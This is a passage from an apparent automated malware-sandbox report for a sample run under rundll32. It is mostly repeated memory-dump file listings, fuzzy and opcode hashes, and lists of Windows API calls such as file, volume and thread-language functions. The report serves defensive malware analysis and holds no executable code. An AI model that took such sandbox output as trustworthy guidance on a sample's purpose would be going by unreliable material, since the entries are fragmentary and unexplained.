                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorFileLast$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 1269242970-0
                          • Opcode ID: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                          • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                          • Opcode Fuzzy Hash: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                          • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesErrorFileLast
                          • String ID:
                          • API String ID: 1799206407-0
                          • Opcode ID: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                          • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                          • Opcode Fuzzy Hash: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                          • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLastError.KERNEL32 ref: 005115CB
                            • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                          • GetLastError.KERNEL32 ref: 00511666
                            • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                            • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                          • String ID: XLM$5B
                          • API String ID: 3390516113-4037079664
                          • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                          • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetThreadUILanguage.KERNEL32 ref: 004145B9
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Thread$LanguagesPreferred$Language
                          • String ID:
                          • API String ID: 2255706666-0
                          • Opcode ID: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction ID: 57eada3b38194d7b08bb3a3721538a05868af864e37c8cd442cfa6c9d7bf3455
                          • Opcode Fuzzy Hash: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction Fuzzy Hash: 0F31B0723015609ADB58DF36DA543EA2762EB84BDCF446126FA0A47B58EF7CC8C5C344
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • GetVolumeInformationW.KERNEL32 ref: 0043657C
                          • GetDriveTypeW.KERNEL32 ref: 004365D7
                            • Part of subcall function 00436880: GetFileAttributesW.KERNEL32 ref: 0043689F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFile$DriveInformationTypeVolume
                          • String ID: 8dC
                          • API String ID: 2660071179-998101939
                          • Opcode ID: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction ID: 486f2d80f4d3eed2484e1266edd3e8425bc97c3940d013daab9ec3d1af7560df
                          • Opcode Fuzzy Hash: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction Fuzzy Hash: 2F519F72205A81DDDB20DF36D8923E92B65F74578CF549026EE8987B5ACF3EC248C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
